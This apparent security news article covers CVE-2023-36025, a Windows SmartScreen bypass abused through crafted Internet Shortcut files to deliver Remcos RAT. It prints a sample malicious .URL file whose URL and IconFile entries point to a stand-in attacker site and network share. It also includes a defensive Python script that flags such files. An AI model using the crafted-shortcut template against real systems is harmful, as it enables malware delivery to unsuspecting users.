Hackers Exploiting Windows SmartScreen Zero-day Flaw to Deploy Remcos RAT

Microsoft released multiple security patches as part of its Patch Tuesday, including fixes for three zero-day vulnerabilities. One of them, CVE-2023-36025, affected the Windows SmartScreen feature.

The vulnerability carries a severity rating of 8.8 (High) and was actively exploited in the wild. It is described as a security feature bypass that an unauthenticated threat actor can exploit, although successful exploitation requires user interaction.

Windows SmartScreen Zero-day Vulnerability

SmartScreen guards against untrusted sources by warning users about potentially malicious websites and files.

This vulnerability allows a threat actor to craft special files or hyperlinks that bypass SmartScreen's security warnings.

In-the-wild exploitation was tied to a crafted Internet Shortcut file (.URL), which SmartScreen did not properly validate.

Exploit Code Example

A crafted file that exploits this vulnerability has the following form:

[InternetShortcut]
URL=malicious-website.com
IDList=
IconFile=\\192.168.1.100\share\icon.ico
IconIndex=1

The URL entry points to a malicious website, and the IconFile entry can point to a network share (a UNC path) controlled by the threat actor. With these two parameters, a threat actor could deliver malicious payloads and execute them on vulnerable systems.
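The two entries discussed above (a URL target plus an IconFile that resolves to a network location) are exactly what a defender can look for when triaging .URL attachments or quarantined downloads. The script below is an added example written for this article, not the article's proof of concept or Microsoft's code. It parses the [InternetShortcut] section, flags an IconFile that points to a UNC path or network URL, and additionally flags a URL target that is itself a file on a network share (a generalization of the pattern described, not something the article states). The host names and shares in the embedded samples are constructed placeholders from documentation address ranges.

```python
"""Triage Internet Shortcut (.URL) files for the remote-IconFile pattern.

Added example for this article; not the article's PoC. All sample
files below are constructed and use placeholder hosts/shares.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Matches a UNC path such as \\host\share\file.ico
UNC_RE = re.compile(r"^\\\\[^\\]+\\")
REMOTE_SCHEMES = {"http", "https", "ftp", "smb", "webdav"}


def _decode(data: bytes) -> str:
    """Decode a .URL body: honour a UTF-16 BOM, otherwise treat as UTF-8/ASCII."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8-sig", errors="replace")


def parse_internet_shortcut(data: bytes) -> dict[str, str]:
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    fields: dict[str, str] = {}
    section = None
    for raw in _decode(data).splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "internetshortcut" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def is_remote_path(value: str) -> bool:
    """True for UNC paths and network URLs; False for local drive paths."""
    if UNC_RE.match(value):
        return True
    parts = urlsplit(value)
    scheme = parts.scheme.lower()
    if scheme == "file":  # file://host/share is remote, file:///C:/x is local
        return bool(parts.netloc)
    return scheme in REMOTE_SCHEMES


@dataclass
class Triage:
    url: str | None
    icon_file: str | None
    findings: list[str] = field(default_factory=list)


def triage_internet_shortcut(data: bytes) -> Triage:
    """Parse one .URL file and collect the indicators worth an analyst's attention."""
    fields = parse_internet_shortcut(data)
    result = Triage(url=fields.get("url"), icon_file=fields.get("iconfile"))
    if result.icon_file and is_remote_path(result.icon_file):
        result.findings.append(
            "IconFile resolves to a network location (UNC path or URL); "
            "shortcuts created locally keep their icon on the local disk"
        )
    if result.url:
        scheme = urlsplit(result.url).scheme.lower()
        if UNC_RE.match(result.url) or (scheme == "file" and is_remote_path(result.url)):
            result.findings.append("URL target is a file on a network share rather than a web page")
    return result


# Constructed sample mirroring the shape shown in the article (placeholder host/share).
SUSPICIOUS_URL_FILE = rb"""[InternetShortcut]
URL=http://malicious-website.example/
IDList=
IconFile=\\192.0.2.10\share\icon.ico
IconIndex=1
"""

# Constructed benign sample: icon stays on the local disk.
BENIGN_URL_FILE = rb"""[InternetShortcut]
URL=https://example.com/
IconFile=C:\Windows\System32\SHELL32.dll
IconIndex=13
"""

# Constructed UTF-16 sample to exercise the BOM handling in _decode().
UTF16_URL_FILE = b"\xff\xfe" + "[InternetShortcut]\r\nURL=https://example.com/\r\n".encode("utf-16-le")


if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS_URL_FILE), ("benign", BENIGN_URL_FILE)):
        t = triage_internet_shortcut(blob)
        print(f"{name}: URL={t.url!r} IconFile={t.icon_file!r}")
        for finding in t.findings or ["no findings"]:
            print(f"  - {finding}")
```

Running the script prints one finding for the constructed suspicious sample (the remote IconFile) and none for the benign one. The URL host can be fed to a reputation lookup; the remote IconFile is the stronger indicator, because a shortcut a user created in Windows does not normally reference an icon on someone else's share.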

Initial delivery of the malicious file may come through phishing emails or compromised websites. If the user downloads and opens the Internet Shortcut file, the payload executes and gives the threat actor access to the system.

A complete proof of concept for this vulnerability has been published, with detailed information on the source code and the method used.
